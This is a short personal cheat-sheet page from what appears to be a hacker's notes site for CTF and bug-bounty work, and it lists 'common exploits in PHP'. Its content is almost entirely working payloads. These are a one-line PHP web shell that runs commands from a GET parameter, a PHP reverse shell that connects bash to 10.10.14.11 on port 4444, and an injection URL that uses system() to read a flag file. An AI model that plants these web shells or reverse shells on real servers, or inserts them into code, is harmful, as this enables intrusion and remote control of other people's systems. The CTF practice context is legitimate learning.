Skip to content

Notes with 🧉

PHP

Notes with 🧉

About Me
BugBounty
BugBounty
- Reconassiance
- Oneliner2
  Oneliner2
  - OneLiner2 🧉
CTF
CTF
- HackTheBox
  HackTheBox
  - Nmap
  - Machines
    
    Machines
    
    Easy
    
    Easy
    
    OpenAdmin
  - Machines retired
    Machines retired
    
    Forest
    
    Forest
- PortSwigger
  PortSwigger
TheArtofHacking
TheArtofHacking
Tutorials
Tutorials
- WindowsPrivilegeEscalation
  WindowsPrivilegeEscalation
  - Windows ProiPr
- Active directory
  Active directory
- Cloud
  Cloud
  - AWS
- Common
  Common
- Databases
  Databases
  - Sql
- Languages
  Languages
  - PHP PHP
    Table of contents
    
    Cookies
    
    Web shell
    
    Reverse shell
    
    Examples
  - Python
- Logs
  Logs
  - Emails
  - Sql
- Scripting
  Scripting
  - SHC
- Software
  Software
  - Burp Suite
  - Curl
  - Keepass
  - MongoDB
  - Samba
  - Sqlmap
  - Tmux
- Standards
  Standards
  - Owasp
- System
  System
  - GTFOBins 🔢
  - FTP 📁
  - Netcat
  - Nmap
  - Ports
  - Rsync
  - SSH
- Techniques
  Techniques
  - Cracking
  - Discovery
  - Encode
  - File by pass
  - Fuzzing
- Web
  Web
  - Cookies
  - DNS
  - Subdomains
  - XML

PHP

Common exploits in PHP.

Cookies

PHPSESSID is the default session cookie name.

Web shell

<?php system($_GET["cmd"]); ?>

Reverse shell

<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.11/4444 0>&1'");?>

Examples

http://<IP>:45338/?format=${system($_GET[id])}&id=cat%20../flag.txt